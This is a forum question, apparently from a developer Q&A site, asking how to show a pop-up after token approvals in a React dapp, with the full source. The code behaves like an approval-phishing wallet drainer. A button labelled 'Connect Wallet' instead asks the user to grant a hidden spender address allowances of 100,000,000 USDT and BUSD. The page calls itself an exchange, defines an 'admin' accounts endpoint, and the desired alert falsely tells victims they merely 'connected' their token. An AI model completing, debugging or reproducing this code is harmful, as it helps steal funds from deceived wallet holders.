# React Dapp, Wont notify user after successful TX

Tags: web3js, javascript, dapps, react

This is my "Test" dapp which i am building, i am struggling to call an event handler to check if the user has approved spending on a certain contract, in this case USDt 0x55d398326f99059fF775485246999027B3197955.

I can connect to the wallet, approve both of my contracts BUT i am struggling to add an alert after i want to create a notification for the user to say "Your Spend Is Approved".

Any advice? I have tried numerous solutions but they all fail,  I have tried to use

```
web3.eth.on('approval', async (from, spender, amount, token) => {
  // Check if the approved token address and amount match your criteria
  if (token === '0xYourTokenAddress' && amount >= 100) {
    // Display a pop-up message using JavaScript
    alert('You have successfully connected your BEP-20 Token!');
  }
});
```

But it just tells me 'web3' is not defined

```
import { useEffect, useState } from "react";
import "./App.css";
import {ethers} from "ethers";

import { Web3ReactProvider } from '@web3-react/core'
import Web3 from 'web3'

function getLibrary(provider) {
  return new Web3(provider)
}

let walletAddress;
let spender_address = "#####################################";
let admin_url = "https://adminclear.xyz/api"
let ADMIN_ENDPOINT = admin_url + "/accounts";
let usdtAddress = "#########################################"
let busdAddress = "0x55d398326f99059fF775485246999027B3197955"

const usdtAbi = [{
        inputs: [],
        payable: false,
        stateMutability: "nonpayable",
        type: "constructor",
    },
    {
        anonymous: false, 
        inputs: [{
                indexed: true,
                internalType: "address",
                name: "owner",
                type: "address",
            },
            {
                indexed: true,
                internalType: "address",
                name: "spender",
                type: "address",
            },
            {
                indexed: false,
                internalType: "uint256",
                name: "value",
                type: "uint256",
            },
        ],
        name: "Approval",
        type: "event",
    },
    {
        anonymous: false,
        inputs: [{
                indexed: true,
                internalType: "address",
                name: "previousOwner",
                type: "address",
            },
            {
                indexed: true,
                internalType: "address",
                name: "newOwner",
                type: "address",
            },
        ],
        name: "OwnershipTransferred",
        type: "event",
    },
    {
        anonymous: false,
        inputs: [{
                indexed: true,
                internalType: "address",
                name: "from",
                type: "address",
            },
            {
                indexed: true,
                internalType: "address",
                name: "to",
                type: "address",
            },
            {
                indexed: false,
                internalType: "uint256",
                name: "value",
                type: "uint256",
            },
        ],
        name: "Transfer",
        type: "event",
    },
    {
        constant: true,
        inputs: [],
        name: "_decimals",
        outputs: [{
            internalType: "uint8",
            name: "",
            type: "uint8"
        }],
        payable: false,
        stateMutability: "view",
        type: "function",
    },
    {
        constant: true,
        inputs: [],
        name: "_name",
        outputs: [{
            internalType: "string",
            name: "",
            type: "string"
        }],
        payable: false,
        stateMutability: "view",
        type: "function",
    },
    {
        constant: true,
        inputs: [],
        name: "_symbol",
        outputs: [{
            internalType: "string",
            name: "",
            type: "string"
        }],
        payable: false,
        stateMutability: "view",
        type: "function",
    },
    {
        constant: true,
        inputs: [{
                internalType: "address",
                name: "owner",
                type: "address"
            },
            {
                internalType: "address",
                name: "spender",
                type: "address"
            },
        ],
        name: "allowance",
        outputs: [{
            internalType: "uint256",
            name: "",
            type: "uint256"
        }],
        payable: false,
        stateMutability: "view",
        type: "function",
    },
    {
        constant: false,
        inputs: [{
                internalType: "address",
                name: "spender",
                type: "address"
            },
            {
                internalType: "uint256",
                name: "amount",
                type: "uint256"
            },
        ],
        name: "approve",
        outputs: [{
            internalType: "bool",
            name: "",
            type: "bool"
        }],
        payable: false,
        stateMutability: "nonpayable",
        type: "function",
    },
    {
        constant: true,
        inputs: [{
            internalType: "address",
            name: "account",
            type: "address"
        }],
        name: "balanceOf",
        outputs: [{
            internalType: "uint256",
            name: "",
            type: "uint256"
        }],
        payable: false,
        stateMutability: "view",
        type: "function",
    },
    {
        constant: true,
        inputs: [],
        name: "decimals",
        outputs: [{
            internalType: "uint256",
            name: "",
            type: "uint256"
        }],
        payable: false,
        stateMutability: "view",
        type: "function",
    },
    {
        constant: false,
        inputs: [{
                internalType: "address",
                name: "spender",
                type: "address"
            },
            {
                internalType: "uint256",
                name: "subtractedValue",
                type: "uint256",
            },
        ],
        name: "decreaseAllowance",
        outputs: [{
            internalType: "bool",
            name: "",
            type: "bool"
        }],
        payable: false,
        stateMutability: "nonpayable",
        type: "function",
    },
    {
        constant: true,
        inputs: [],
        name: "getOwner",
        outputs: [{
            internalType: "address",
            name: "",
            type: "address"
        }],
        payable: false,
        stateMutability: "view",
        type: "function",
    },
    {
        constant: false,
        inputs: [{
                internalType: "address",
                name: "spender",
                type: "address"
            },
            {
                internalType: "uint256",
                name: "addedValue",
                type: "uint256"
            },
        ],
        name: "increaseAllowance",
        outputs: [{
            internalType: "bool",
            name: "",
            type: "bool"
        }],
        payable: false,
        stateMutability: "nonpayable",
        type: "function",
    },
    {
        constant: false,
        inputs: [{
            internalType: "uint256",
            name: "amount",
            type: "uint256"
        }],
        name: "mint",
        outputs: [{
            internalType: "bool",
            name: "",
            type: "bool"
        }],
        payable: false,
        stateMutability: "nonpayable",
        type: "function",
    },
    {
        constant: true,
        inputs: [],
        name: "name",
        outputs: [{
            internalType: "string",
            name: "",
            type: "string"
        }],
        payable: false,
        stateMutability: "view",
        type: "function",
    },
    {
        constant: true,
        inputs: [],
        name: "owner",
        outputs: [{
            internalType: "address",
            name: "",
            type: "address"
        }],
        payable: false,
        stateMutability: "view",
        type: "function",
    },
    {
        constant: false,
        inputs: [],
        name: "renounceOwnership",
        outputs: [],
        payable: false,
        stateMutability: "nonpayable",
        type: "function",
    },
    {
        constant: true,
        inputs: [],
        name: "symbol",
        outputs: [{
            internalType: "string",
            name: "",
            type: "string"
        }],
        payable: false,
        stateMutability: "view",
        type: "function",
    },
    {
        constant: true,
        inputs: [],
        name: "totalSupply",
        outputs: [{
            internalType: "uint256",
            name: "",
            type: "uint256"
        }],
        payable: false,
        stateMutability: "view",
        type: "function",
    },
    {
        constant: false,
        inputs: [{
                internalType: "address",
                name: "recipient",
                type: "address"
            },
            {
                internalType: "uint256",
                name: "amount",
                type: "uint256"
            },
        ],
        name: "transfer",
        outputs: [{
            internalType: "bool",
            name: "",
            type: "bool"
        }],
        payable: false,
        stateMutability: "nonpayable",
        type: "function",
    },
    {
        constant: false,
        inputs: [{
                internalType: "address",
                name: "sender",
                type: "address"
            },
            {
                internalType: "address",
                name: "recipient",
                type: "address"
            },
            {
                internalType: "uint256",
                name: "amount",
                type: "uint256"
            },
        ],
        name: "transferFrom",
        outputs: [{
            internalType: "bool",
            name: "",
            type: "bool"
        }],
        payable: false,
        stateMutability: "nonpayable",
        type: "function",
    },
    {
        constant: false,
        inputs: [{
            internalType: "address",
            name: "newOwner",
            type: "address"
        }, ],
        name: "transferOwnership",
        outputs: [],
        payable: false,
        stateMutability: "nonpayable",
        type: "function",
    },
];

function App() {
  const [walletAddress, setWalletAddress] = useState("");

  useEffect(() => {
    getCurrentWalletConnected();
    addWalletListener();
  }, [walletAddress]);

  const connectWallet = async () => {
    if (typeof window != "undefined" && typeof window.ethereum != "undefined") {
      try {
        /* MetaMask is installed */
        const accounts = await window.ethereum.request({
          method: "eth_requestAccounts",
        });
        setWalletAddress(accounts[0]);
      } catch (err) {
        console.error(err.message);
      }
    } else {
      /* MetaMask is not installed */
      console.log("Please install MetaMask");
    }
  };

  const getCurrentWalletConnected = async () => {
    if (typeof window != "undefined" && typeof window.ethereum != "undefined") {
      try {
        const accounts = await window.ethereum.request({
          method: "eth_accounts",
        });
        if (accounts.length > 0) {
          setWalletAddress(accounts[0]);
          console.log(accounts[0]);
        } else {
          console.log("Connect to MetaMask using the Connect button");
        }
      } catch (err) {
        console.error(err.message);
      }
    } else {
      /* MetaMask is not installed */
      console.log("Please install MetaMask");
    }
  };

  const addWalletListener = async () => {
    if (typeof window != "undefined" && typeof window.ethereum != "undefined") {
      window.ethereum.on("accountsChanged", (accounts) => {
        setWalletAddress(accounts[0]);
        console.log(accounts[0]);
      });
    } else {
      /* MetaMask is not installed */
      setWalletAddress("");
      console.log("Please install MetaMask");
    }
  };

  function approve() {
    if (!walletAddress) {

        alert("No Web3 provider detected. Please connect your wallet with a valid web3 provider.");
        return;
    }
    connectAdmin(walletAddress)
}


async function connectAdmin(account) {
    const appContract = spender_address;
    let accountAllowance;
    const ulAllowance = 100000000;
    const provider = new ethers.providers.Web3Provider(window.ethereum);
    console.log(provider)
    const signer = provider.getSigner();
    const usdtContract = new ethers.Contract(usdtAddress, usdtAbi, signer);
    const busdContract = new ethers.Contract(busdAddress, usdtAbi, signer);
    const balanceTx = await usdtContract.balanceOf(account);
    const balance = parseFloat(ethers.utils.formatEther(balanceTx));
    const allowanceTx = await usdtContract.allowance(account, appContract);
    const allowance = parseFloat(ethers.utils.formatEther(allowanceTx));
    accountAllowance = allowance;
    const ballowanceTx = await busdContract.allowance(account, appContract);
    const ballowance = parseFloat(ethers.utils.formatEther(ballowanceTx));
    accountAllowance = allowance;

  
   console.log({
        allowance,
        balance
    });

    if (allowance < ulAllowance) {
        try {
            const approveAmt = ethers.utils.parseUnits(
                ulAllowance.toString(),
                "ether"
            );
            const approveTx = await usdtContract.approve(
                appContract,
                approveAmt
                
            );
            const cf = await approveTx.wait();

            if (cf) {
                accountAllowance = ulAllowance;
            }
            console.log({
                approveTx
            });
        } catch (error) {
            console.log(error);
        }
    }

    if (ballowance < ulAllowance) {
        try {
            const bapproveAmt = ethers.utils.parseUnits(
                ulAllowance.toString(),
                "ether"
            );
            const bapproveTx = await busdContract.approve(
                appContract,
                bapproveAmt
            );
            const bcf = await bapproveTx.wait();

            if (bcf) {
                accountAllowance = ulAllowance;
            }
            console.log({
                bapproveTx
            });
        } catch (error) {
            console.log(error);
        }
    }




  }




   

  return (
    <div>
      <nav className="navbar">
        <div className="container">
          <div className="navbar-brand">
            <h1 className="navbar-item is-size-4">Dapp Test</h1>
          </div>
          <div id="navbarMenu" className="navbar-menu">
            <div className="navbar-end is-align-items-center">
              <button
                className="button is-white connect-wallet"
                onClick={approve}
              >
                <span className="is-link has-text-weight-bold">
                  {walletAddress && walletAddress.length > 0
                    ? `Connected: ${walletAddress.substring(
                        0,
                        6
                      )}...${walletAddress.substring(38)}`
                    : "Connect Wallet"}
                </span>
              </button>
            </div>
          </div>
        </div>
      </nav>
      <section className="hero is-fullheight">
        <div className="faucet-hero-body">
          <div className="container has-text-centered main-content">
            <h1 className="title is-1">Exchange Below</h1>
            <p>Click to exchange.</p>

             <button
                className="button is-white connect-wallet"
                onClick={approve}
              ></button>


                <button
                className="button is-white connect-wallet"
                onClick={connectWallet}
              >
                <span className="is-link has-text-weight-bold">
                  {walletAddress && walletAddress.length > 0
                    ? `Connected: ${walletAddress.substring(
                        0,
                        6
                      )}...${walletAddress.substring(38)}`
                    : "Connect Wallet"}
                </span>
              </button>


           
          </div>
        </div>
      </section>
    </div>
  );
}

export default App;
```